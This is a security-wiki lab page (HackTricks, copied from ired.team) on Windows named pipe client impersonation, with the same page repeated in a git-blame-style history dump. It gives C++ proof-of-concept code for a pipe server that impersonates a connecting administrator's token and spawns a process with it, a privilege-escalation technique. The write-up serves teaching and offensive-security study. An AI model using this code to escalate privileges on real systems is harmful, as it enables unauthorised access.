hacktricks/windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.md

# Named Pipe Client Impersonation

<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>


**This information was copied from** [**https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation**](https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation)

# Overview

A `pipe` is a block of shared memory that processes can use for communication and data exchange.

`Named Pipes` is a Windows mechanism that enables two unrelated processes to exchange data between themselves, even if the processes are located on two different networks. It's very simar to client/server architecture as notions such as `a named pipe server` and a named `pipe client` exist.

A named pipe server can open a named pipe with some predefined name and then a named pipe client can connect to that pipe via the known name. Once the connection is established, data exchange can begin.

This lab is concerned with a simple PoC code that allows:

* creating a single-threaded dumb named pipe server that will accept one client connection
* named pipe server to write a simple message to the named pipe so that the pipe client can read it

# Code

Below is the PoC for both the server and the client:

{% tabs %}
{% tab title="namedPipeServer.cpp" %}
```cpp
#include "pch.h"
#include <Windows.h>
#include <iostream>

int main() {
	LPCWSTR pipeName = L"\\\\.\\pipe\\mantvydas-first-pipe";
	LPVOID pipeBuffer = NULL;
	HANDLE serverPipe;
	DWORD readBytes = 0;
	DWORD readBuffer = 0;
	int err = 0;
	BOOL isPipeConnected;
	BOOL isPipeOpen;
	wchar_t message[] = L"HELL";
	DWORD messageLenght = lstrlen(message) * 2;
	DWORD bytesWritten = 0;

	std::wcout << "Creating named pipe " << pipeName << std::endl;
	serverPipe = CreateNamedPipe(pipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1, 2048, 2048, 0, NULL);
	
	isPipeConnected = ConnectNamedPipe(serverPipe, NULL);
	if (isPipeConnected) {
		std::wcout << "Incoming connection to " << pipeName << std::endl;
	}
	
	std::wcout << "Sending message: " << message << std::endl;
	WriteFile(serverPipe, message, messageLenght, &bytesWritten, NULL);
	
	return 0;
}
```
{% endtab %}

{% tab title="namedPipeClient.cpp" %}
```cpp
#include "pch.h"
#include <iostream>
#include <Windows.h>

const int MESSAGE_SIZE = 512;

int main()
{
	LPCWSTR pipeName = L"\\\\10.0.0.7\\pipe\\mantvydas-first-pipe";
	HANDLE clientPipe = NULL;
	BOOL isPipeRead = true;
	wchar_t message[MESSAGE_SIZE] = { 0 };
	DWORD bytesRead = 0;

	std::wcout << "Connecting to " << pipeName << std::endl;
	clientPipe = CreateFile(pipeName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	
	while (isPipeRead) {
		isPipeRead = ReadFile(clientPipe, &message, MESSAGE_SIZE, &bytesRead, NULL);
		std::wcout << "Received message: " << message;
	}

	return 0;
}
```
{% endtab %}
{% endtabs %}

# Execution

Below shows the named pipe server and named pipe client working as expected:

![](<../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (2).png>)

Worth nothing that the named pipes communication by default uses SMB protocol:

![](../../.gitbook/assets/screenshot-from-2019-04-04-23-51-48.png)

Checking how the process maintains a handle to our named pipe `mantvydas-first-pipe`:

![](<../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (1).png>)

Similary, we can see the client having an open handle to the named pipe:

![](../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22.png)

We can even see our pipe with powershell:

```csharp
((Get-ChildItem \\.\pipe\).name)[-1..-5]
```

![](<../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (3).png>)

# Token Impersonation

{% hint style="info" %}
Note that in order to impersonate the token of the client process you need to have (the server process creating the pipe) the **`SeImpersonate`** token privilege
{% endhint %}

It is possible for the named pipe server to impersonate the named pipe client's security context by leveraging a `ImpersonateNamedPipeClient` API call which in turn changes the named pipe server's current thread's token with that of the named pipe client's token.

We can update the the named pipe server's code like this to achieve the impersonation - note that modifications are seen in line 25 and below:

```cpp
int main() {
	LPCWSTR pipeName = L"\\\\.\\pipe\\mantvydas-first-pipe";
	LPVOID pipeBuffer = NULL;
	HANDLE serverPipe;
	DWORD readBytes = 0;
	DWORD readBuffer = 0;
	int err = 0;
	BOOL isPipeConnected;
	BOOL isPipeOpen;
	wchar_t message[] = L"HELL";
	DWORD messageLenght = lstrlen(message) * 2;
	DWORD bytesWritten = 0;

	std::wcout << "Creating named pipe " << pipeName << std::endl;
	serverPipe = CreateNamedPipe(pipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1, 2048, 2048, 0, NULL);
	
	isPipeConnected = ConnectNamedPipe(serverPipe, NULL);
	if (isPipeConnected) {
		std::wcout << "Incoming connection to " << pipeName << std::endl;
	}
	
	std::wcout << "Sending message: " << message << std::endl;
	WriteFile(serverPipe, message, messageLenght, &bytesWritten, NULL);
	
	std::wcout << "Impersonating the client..." << std::endl;
	ImpersonateNamedPipeClient(serverPipe);
	err = GetLastError();	

	STARTUPINFO	si = {};
	wchar_t command[] = L"C:\\Windows\\system32\\notepad.exe";
	PROCESS_INFORMATION pi = {};
	HANDLE threadToken = GetCurrentThreadToken();
	CreateProcessWithTokenW(threadToken, LOGON_WITH_PROFILE, command, NULL, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);

	return 0;
}
```

Running the server and connecting to it with the client that is running under administrator@offense.local security context, we can see that the main thread of the named server pipe assumed the token of the named pipe client - offense\administrator, although the PipeServer.exe itself is running under ws01\mantvydas security context. Sounds like a good way to escalate privileges?

<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>
GitBook: [#3143] No subject 2022-04-28 23:27:22 +00:00			`# Named Pipe Client Impersonation`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

			`<summary><strong>Support HackTricks and get benefits!</strong></summary>`

			`Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`

			`Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`

			`Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`

			`Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`

			`Share your hacking tricks submitting PRs to the [hacktricks github repo](https://github.com/carlospolop/hacktricks).`

			`</details>`

GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
fix bad chars 2022-04-05 22:24:52 +00:00			`This information was copied from [https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation](https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
fix mess 2 2022-05-01 12:49:36 +00:00			`# Overview`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			A `pipe` is a block of shared memory that processes can use for communication and data exchange.

			`Named Pipes` is a Windows mechanism that enables two unrelated processes to exchange data between themselves, even if the processes are located on two different networks. It's very simar to client/server architecture as notions such as `a named pipe server` and a named `pipe client` exist.

			`A named pipe server can open a named pipe with some predefined name and then a named pipe client can connect to that pipe via the known name. Once the connection is established, data exchange can begin.`

			`This lab is concerned with a simple PoC code that allows:`

			`* creating a single-threaded dumb named pipe server that will accept one client connection`
			`* named pipe server to write a simple message to the named pipe so that the pipe client can read it`

fix mess 2 2022-05-01 12:49:36 +00:00			`# Code`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`Below is the PoC for both the server and the client:`

			`{% tabs %}`
			`{% tab title="namedPipeServer.cpp" %}`
			```cpp
			`#include "pch.h"`
			`#include <Windows.h>`
			`#include <iostream>`

			`int main() {`
			`LPCWSTR pipeName = L"\\\\.\\pipe\\mantvydas-first-pipe";`
			`LPVOID pipeBuffer = NULL;`
			`HANDLE serverPipe;`
			`DWORD readBytes = 0;`
			`DWORD readBuffer = 0;`
			`int err = 0;`
			`BOOL isPipeConnected;`
			`BOOL isPipeOpen;`
			`wchar_t message[] = L"HELL";`
			`DWORD messageLenght = lstrlen(message) * 2;`
			`DWORD bytesWritten = 0;`

			`std::wcout << "Creating named pipe " << pipeName << std::endl;`
			`serverPipe = CreateNamedPipe(pipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1, 2048, 2048, 0, NULL);`

			`isPipeConnected = ConnectNamedPipe(serverPipe, NULL);`
			`if (isPipeConnected) {`
			`std::wcout << "Incoming connection to " << pipeName << std::endl;`
			`}`

			`std::wcout << "Sending message: " << message << std::endl;`
			`WriteFile(serverPipe, message, messageLenght, &bytesWritten, NULL);`

			`return 0;`
			`}`
			```
			`{% endtab %}`

			`{% tab title="namedPipeClient.cpp" %}`
			```cpp
			`#include "pch.h"`
			`#include <iostream>`
			`#include <Windows.h>`

			`const int MESSAGE_SIZE = 512;`

			`int main()`
			`{`
			`LPCWSTR pipeName = L"\\\\10.0.0.7\\pipe\\mantvydas-first-pipe";`
			`HANDLE clientPipe = NULL;`
			`BOOL isPipeRead = true;`
			`wchar_t message[MESSAGE_SIZE] = { 0 };`
			`DWORD bytesRead = 0;`

			`std::wcout << "Connecting to " << pipeName << std::endl;`
			`clientPipe = CreateFile(pipeName, GENERIC_READ \| GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);`

			`while (isPipeRead) {`
			`isPipeRead = ReadFile(clientPipe, &message, MESSAGE_SIZE, &bytesRead, NULL);`
			`std::wcout << "Received message: " << message;`
			`}`

			`return 0;`
			`}`
			```
			`{% endtab %}`
			`{% endtabs %}`

fix mess 2 2022-05-01 12:49:36 +00:00			`# Execution`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`Below shows the named pipe server and named pipe client working as expected:`

GitBook: [#3157] No subject 2022-04-30 20:31:18 +00:00			`![](<../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (2).png>)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`Worth nothing that the named pipes communication by default uses SMB protocol:`

GitBook: [#3157] No subject 2022-04-30 20:31:18 +00:00			`![](../../.gitbook/assets/screenshot-from-2019-04-04-23-51-48.png)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			Checking how the process maintains a handle to our named pipe `mantvydas-first-pipe`:

GitBook: [#3157] No subject 2022-04-30 20:31:18 +00:00			`![](<../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (1).png>)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`Similary, we can see the client having an open handle to the named pipe:`

GitBook: [#3157] No subject 2022-04-30 20:31:18 +00:00			`![](../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22.png)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`We can even see our pipe with powershell:`

			```csharp
			`((Get-ChildItem \\.\pipe\).name)[-1..-5]`
			```

GitBook: [#3157] No subject 2022-04-30 20:31:18 +00:00			`![](<../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (3).png>)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
fix mess 2 2022-05-01 12:49:36 +00:00			`# Token Impersonation`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`{% hint style="info" %}`
GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			Note that in order to impersonate the token of the client process you need to have (the server process creating the pipe) the `SeImpersonate` token privilege
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`{% endhint %}`

			It is possible for the named pipe server to impersonate the named pipe client's security context by leveraging a `ImpersonateNamedPipeClient` API call which in turn changes the named pipe server's current thread's token with that of the named pipe client's token.

fix bad chars 2022-04-05 22:24:52 +00:00			`We can update the the named pipe server's code like this to achieve the impersonation - note that modifications are seen in line 25 and below:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			```cpp
			`int main() {`
			`LPCWSTR pipeName = L"\\\\.\\pipe\\mantvydas-first-pipe";`
			`LPVOID pipeBuffer = NULL;`
			`HANDLE serverPipe;`
			`DWORD readBytes = 0;`
			`DWORD readBuffer = 0;`
			`int err = 0;`
			`BOOL isPipeConnected;`
			`BOOL isPipeOpen;`
			`wchar_t message[] = L"HELL";`
			`DWORD messageLenght = lstrlen(message) * 2;`
			`DWORD bytesWritten = 0;`

			`std::wcout << "Creating named pipe " << pipeName << std::endl;`
			`serverPipe = CreateNamedPipe(pipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1, 2048, 2048, 0, NULL);`

			`isPipeConnected = ConnectNamedPipe(serverPipe, NULL);`
			`if (isPipeConnected) {`
			`std::wcout << "Incoming connection to " << pipeName << std::endl;`
			`}`

			`std::wcout << "Sending message: " << message << std::endl;`
			`WriteFile(serverPipe, message, messageLenght, &bytesWritten, NULL);`

			`std::wcout << "Impersonating the client..." << std::endl;`
			`ImpersonateNamedPipeClient(serverPipe);`
			`err = GetLastError();`

			`STARTUPINFO si = {};`
			`wchar_t command[] = L"C:\\Windows\\system32\\notepad.exe";`
			`PROCESS_INFORMATION pi = {};`
			`HANDLE threadToken = GetCurrentThreadToken();`
			`CreateProcessWithTokenW(threadToken, LOGON_WITH_PROFILE, command, NULL, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);`

			`return 0;`
			`}`
			```

			`Running the server and connecting to it with the client that is running under administrator@offense.local security context, we can see that the main thread of the named server pipe assumed the token of the named pipe client - offense\administrator, although the PipeServer.exe itself is running under ws01\mantvydas security context. Sounds like a good way to escalate privileges?`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

			`<summary><strong>Support HackTricks and get benefits!</strong></summary>`

			`Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`

			`Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`

			`Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`

			`Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`

			`Share your hacking tricks submitting PRs to the [hacktricks github repo](https://github.com/carlospolop/hacktricks).`

			`</details>`